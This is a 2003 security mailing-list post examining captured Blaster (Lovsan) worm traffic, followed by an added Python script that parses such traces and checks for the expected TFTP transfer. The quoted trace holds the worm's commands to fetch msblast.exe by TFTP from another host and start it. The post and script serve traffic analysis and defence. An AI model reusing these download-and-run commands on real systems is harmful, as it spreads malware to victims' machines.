Lovsan packet traces (was: Re: [Dshield] infocon: yellow)

David Kennedy CISSP david.kennedy at acm.org
Tue Aug 12 04:31:56 GMT 2003


At 04:37 PM 8/11/03 -0700, John Sage wrote:

>T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
>  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
>  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
>  74 2e 65 78 65 0a                                     t.exe.          
>#
>T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
>#
>T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
>  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
>  65 0a                                                 e.              
>exit


Hmmm...has anyone else got a trace to look at?  The various analyses say
that the victim fetches the executable from the attacker via TFTP (which
uses UDP), and some say the worm installs a TFTP server on the attacker to
serve up the executable.  But that's not in this trace.  This looks like
command channel traffic to do the GET but it appears to me to be
attacker:ephemeral vis-a-vis victim:4444.  Where's the port 69 UDP traffic?
*Is* there port 69 UDP traffic?


-- 
Regards,
                                          /"\
David Kennedy CISSP                       \ / ASCII Ribbon Campaign
Protect what you connect;                  X  Against HTML Mail
Look both ways before crossing the Net.   / \
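To check the question above against a capture, here is an added example (not part of the post or of the DShield list): a small Python parser for ngrep-style trace lines like the ones quoted, which extracts the "tftp -i HOST GET FILE" command from the TCP port 4444 channel and then looks for a UDP port 69 read request from the victim back to the named host. The first sample is the trace quoted in the post; the second is constructed, including an assumed ngrep "U" header line for UDP and a TFTP RRQ payload (RFC 1350), to show what the check reports when the transfer is present. Names, ports and the 'U' header format are assumptions for the example.

```python
import re

# ngrep-style packet header, e.g.
# "T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]"
# A UDP packet is assumed to print as "U <date> <time> src:port -> dst:port" (no flags).
HEADER_RE = re.compile(
    r"^(?P<proto>[TU])\s+(?P<date>\S+)\s+(?P<time>\S+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)"
    r"(?:\s+\[(?P<flags>[A-Z]*)\])?\s*$"
)
# Hex-dump line: leading whitespace, then 2-digit hex bytes; the ASCII column is skipped
# because its first token is not a valid two-character hex pair.
HEXDUMP_RE = re.compile(r"^\s+((?:[0-9a-fA-F]{2}\s+)+)")
TFTP_CMD_RE = re.compile(r"tftp\s+-i\s+(?P<host>[\d.]+)\s+GET\s+(?P<file>\S+)", re.I)

def parse_trace(text):
    """Turn ngrep-style output (optionally '>'-quoted from e-mail) into packet dicts."""
    packets, cur = [], None
    for raw in text.splitlines():
        line = raw.lstrip(">")          # drop e-mail quoting prefix if present
        m = HEADER_RE.match(line)
        if m:
            cur = {**m.groupdict(), "payload": bytearray()}
            cur["sport"], cur["dport"] = int(cur["sport"]), int(cur["dport"])
            packets.append(cur)
            continue
        if cur is None or line.strip() == "#":   # '#' = packet without matching payload
            continue
        h = HEXDUMP_RE.match(line)
        if h:
            cur["payload"].extend(bytes.fromhex(h.group(1).replace(" ", "")))
    return packets

def parse_tftp_rrq(payload):
    """Decode a TFTP read request: opcode 1, filename, NUL, mode, NUL (RFC 1350)."""
    if len(payload) < 4 or payload[:2] != b"\x00\x01":
        return None
    fields = bytes(payload[2:]).split(b"\x00")
    if len(fields) < 3:                 # filename, mode, and the empty tail after the last NUL
        return None
    return fields[0].decode("ascii", "replace"), fields[1].decode("ascii", "replace").lower()

def check_tftp_fetch(packets, cmd_port=4444, tftp_port=69):
    """For each TCP command-channel packet carrying a 'tftp -i HOST GET FILE' command,
    report whether the victim actually sent a UDP packet to HOST:69 and what it asked for."""
    findings = []
    for p in packets:
        if p["proto"] != "T" or p["dport"] != cmd_port:
            continue
        m = TFTP_CMD_RE.search(p["payload"].decode("ascii", "replace"))
        if not m:
            continue
        victim, server = p["dst"], m.group("host")
        udp = [q for q in packets if q["proto"] == "U" and q["src"] == victim
               and q["dst"] == server and q["dport"] == tftp_port]
        rrq = parse_tftp_rrq(udp[0]["payload"]) if udp else None
        findings.append({"attacker": p["src"], "victim": victim, "tftp_server": server,
                         "file": m.group("file"), "udp69_seen": bool(udp),
                         "rrq_file": rrq[0] if rrq else None})
    return findings

# Sample 1: the trace quoted in the post (no UDP traffic at all).
SAMPLE_QUOTED = """\
>T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
>  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
>  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
>  74 2e 65 78 65 0a                                     t.exe.
>#
>T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
>#
>T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
>  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
>  65 0a                                                 e.
>exit
"""

# Sample 2 (constructed): same command channel plus an assumed UDP line with a TFTP RRQ
# for msblast.exe in octet mode, i.e. what the analyses say should follow the GET.
SAMPLE_WITH_TFTP = SAMPLE_QUOTED + """\
U 2003/08/11 16:21:32.500000 12.82.140.147:1035 -> 12.82.154.207:69
  00 01 6d 73 62 6c 61 73    74 2e 65 78 65 00 6f 63    ..msblast.exe.oc
  74 65 74 00                                           tet.
"""

if __name__ == "__main__":
    for label, sample in (("quoted trace", SAMPLE_QUOTED), ("constructed", SAMPLE_WITH_TFTP)):
        for f in check_tftp_fetch(parse_trace(sample)):
            print(label, f)
```

Run on the quoted trace the check reports `udp69_seen: False`, which is exactly the gap the post points out; on the constructed sample it reports the RRQ filename, so the two sides of the transfer can be tied together from one capture.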

